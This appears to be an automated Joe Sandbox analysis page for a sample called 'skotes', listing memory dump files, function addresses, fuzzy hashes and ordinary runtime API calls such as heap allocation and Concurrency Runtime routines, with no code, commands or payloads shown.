Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01b8f7612ac8ba97a1144e63f7aa527a7d8b9471b3909804920283dd86ee8eaf
Instruction ID: 76d3e4a983e79e4f32a0ba0bb9c81419cd71478fbe57d0463365dd3718b41d68
Opcode Fuzzy Hash: 01b8f7612ac8ba97a1144e63f7aa527a7d8b9471b3909804920283dd86ee8eaf
Instruction Fuzzy Hash: 1F21D672905108BBEB217B68AC4ABEF3769EF41374F100355FA242B1D1DB7C9E058661

Function 007BD82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,007BA813,00000001,00000364,00000006,000000FF,?,?,0079D3FC,00796CB7,?,00797A8B,8B18EC84), ref: 007BD870

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ce4a806bc57a15acd4ea17d3f0ac102f44c6a794b99744ac89d854d3b8cfc7f2
Instruction ID: 0a43c6ccd141d0612e2e6ff7268a44ffffa8c57c2c7ee50c337d6d6f482bfd2b
Opcode Fuzzy Hash: ce4a806bc57a15acd4ea17d3f0ac102f44c6a794b99744ac89d854d3b8cfc7f2
Instruction Fuzzy Hash: 84F02732605124A6EB312A76DC05BDB3759DF817B2B288021FD08EB191FA2CEC0086E1

Function 05430C68 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c606be57f27454d224076057ccedde6e0867169dc3c245320ded026b39322471
Instruction ID: e216d1291ede81b2ae00b459ab71ab81ae719da4a42c60beb3c4a5d9a0fc34f2
Opcode Fuzzy Hash: c606be57f27454d224076057ccedde6e0867169dc3c245320ded026b39322471
Instruction Fuzzy Hash: 2211D37B04D154FEE361C5456B0AAF677BAF68A730330855BF40B8A132D2540A9B9672

Function 05430C2E Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea7d71d0f2320c2cca071383293a703e81e47c753c3008c4051b448257641726
Instruction ID: b5e8afa490c9d31dea126ac6d00d98234bf18b3db76c2a67c8bd06084c27e7fa
Opcode Fuzzy Hash: ea7d71d0f2320c2cca071383293a703e81e47c753c3008c4051b448257641726
Instruction Fuzzy Hash: C511B8AA048010FEA35AC5456B1EAF666FEF2C9731330821BF40E8A132C658498B9271

Function 05430C54 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 446b9df6293531b1f30050e4c29db7137e2058ee163f58a1d767bc52220eda61
Instruction ID: 51f78fd99b300b5a16c680630ddbde99396d158e91ba09e97ce732bae04a2782
Opcode Fuzzy Hash: 446b9df6293531b1f30050e4c29db7137e2058ee163f58a1d767bc52220eda61
Instruction Fuzzy Hash: 67019EAB14C010FEE352C5456B1EAF66AFFE1CA770331861BF80FC9131D255499B92B1

Function 05430C46 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95cd33527eeb5dd9227b44541edf0e2176f7f5848d4547f89dd1ef253e57143c
Instruction ID: f2a94077f4ae41861fe8308299e2960f20b84f0b2dac70ab340bf7da8b14a00b
Opcode Fuzzy Hash: 95cd33527eeb5dd9227b44541edf0e2176f7f5848d4547f89dd1ef253e57143c
Instruction Fuzzy Hash: 32018CAA048111FDE366C5452B1AAF66AFFE1CA730330861BF84FC9532C2550A9B9271

Function 05430C7F Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3a0d23905546bc6ffaeb0f8edefa5e779642b1627109f40f9ab86c263b05a56
Instruction ID: 27658416cfab629d33fbbc36e1efeabc5c31decc39be8da041ea2d4234789d4b
Opcode Fuzzy Hash: b3a0d23905546bc6ffaeb0f8edefa5e779642b1627109f40f9ab86c263b05a56
Instruction Fuzzy Hash: 5201DFAF14C110FEE351C5456B1AAF66BFFE1C97303308617F84FCA122C2950A8B9271

Function 05430CAD Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 171ec695d2d135bc5546b58f22671bcd2ddea9579bbbabc38270b6993045ab48
Instruction ID: 5583d9a3f80b49767ec04c69fbb3ab82f5c52a7bc6cfd978a9409a7991e89cae
Opcode Fuzzy Hash: 171ec695d2d135bc5546b58f22671bcd2ddea9579bbbabc38270b6993045ab48
Instruction Fuzzy Hash: 8E01A7BF14D050BEE35189552E1EAFA67EEF5CA730735852BF80BC5421C258094B9631

Function 05430CD5 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0941d9db8b710734750e82bcf72f421fe7f0abab39b105cd371ff1b8f042b7f
Instruction ID: a65198af979a94a02aed0faed2e5c7bcecda13a370e3c3042f969f06e4628b00
Opcode Fuzzy Hash: a0941d9db8b710734750e82bcf72f421fe7f0abab39b105cd371ff1b8f042b7f
Instruction Fuzzy Hash: 5801D1BF148040BEF351CA556E1EAFE67EEF6CA7307308A1BF81BC5461C2550A8B9631

Function 05430CA1 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 509a58e59d1fe19b02526d92431cf1599009717333ec116824c2af066c693ab0
Instruction ID: 3cfb2b55d88c13df7ee17c7b4629654705d4f70cac7244951396636fa31d2767
Opcode Fuzzy Hash: 509a58e59d1fe19b02526d92431cf1599009717333ec116824c2af066c693ab0
Instruction Fuzzy Hash: 3DF04FAF148010FEE351C5456B1AAF66BEFE1D9730331861BF80FD5521C2590A9B9231

Function 05430CF4 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4812bb4405912920a781e4b826591cb90b67453c174f2da9b76de2db01e42c96
Instruction ID: 94f68884ecacf6db368ba0d05ecbb6d0dcf3bfc31c5b24059dfe0694a837b837
Opcode Fuzzy Hash: 4812bb4405912920a781e4b826591cb90b67453c174f2da9b76de2db01e42c96
Instruction Fuzzy Hash: 88F030BF148050BDF351C5417F1ABFB67EEE1C8730770891BF40EC4821C2591A9A9631

Function 05430D02 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74e56f0471f65654f598b5c2fcbaca99d873843578c81c9dba8de87868843fd
Instruction ID: 43591850c583ac9cc017c9e8f082ebdf778f0ad03a0433a33f383b10387c9be5
Opcode Fuzzy Hash: a74e56f0471f65654f598b5c2fcbaca99d873843578c81c9dba8de87868843fd
Instruction Fuzzy Hash: 8AE0E57F108010FDE341C9466A19AFB63EEE5C87303308A1BF40AC5016C749168ED672

Function 05430D47 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3379384465.0000000005430000.00000040.00001000.00020000.00000000.sdmp, Offset: 05430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5430000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d06714edf550ae970daa7a67129a920e1e033a68916b831011ab8007e1e8f94
Instruction ID: a7107218df09d5e0e1814adf0aee5a440da4b5c091b627d5f502bbad190e8bbc
Opcode Fuzzy Hash: 6d06714edf550ae970daa7a67129a920e1e033a68916b831011ab8007e1e8f94
Instruction Fuzzy Hash: 39D022AF40D064BCB3A0C0452B0BBF352CFA1CCB303718617F80AC6461E20A184A6070

Non-executed Functions

Function 007A0E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A0F16
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A0F62

Part of subcall function 007A265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 007A2750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 007A0FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A0FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 007A106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 007A10C1

Strings

(, xrefs: 007A0F22

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 9531fcdcb6b65580ec67af5569df2de8c5de86817819c268295ad5998fd7559f
Instruction ID: 371e56bbaf1fe685a82353e79f6e26f864e8a0b7f8a1de39ff48b4aa3cb2d768
Opcode Fuzzy Hash: 9531fcdcb6b65580ec67af5569df2de8c5de86817819c268295ad5998fd7559f
Instruction Fuzzy Hash: E8B17FB0A01615EFDB28CF58D980B7AB7B5FF89304F14866DE905AB641D338ED81CB94

Function 007A1602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007A2CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 007A2D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 007A1614

Part of subcall function 007A2E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 007A2E39
Part of subcall function 007A2E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 007A2EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 007A1746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 007A17A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 007A17B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 007A17ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 007A180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 007A181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 007A1823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 007A183B

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: c853a1e94f47dd981b7945d769441c66857e07ee2ab483787123c3af67214b9c
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
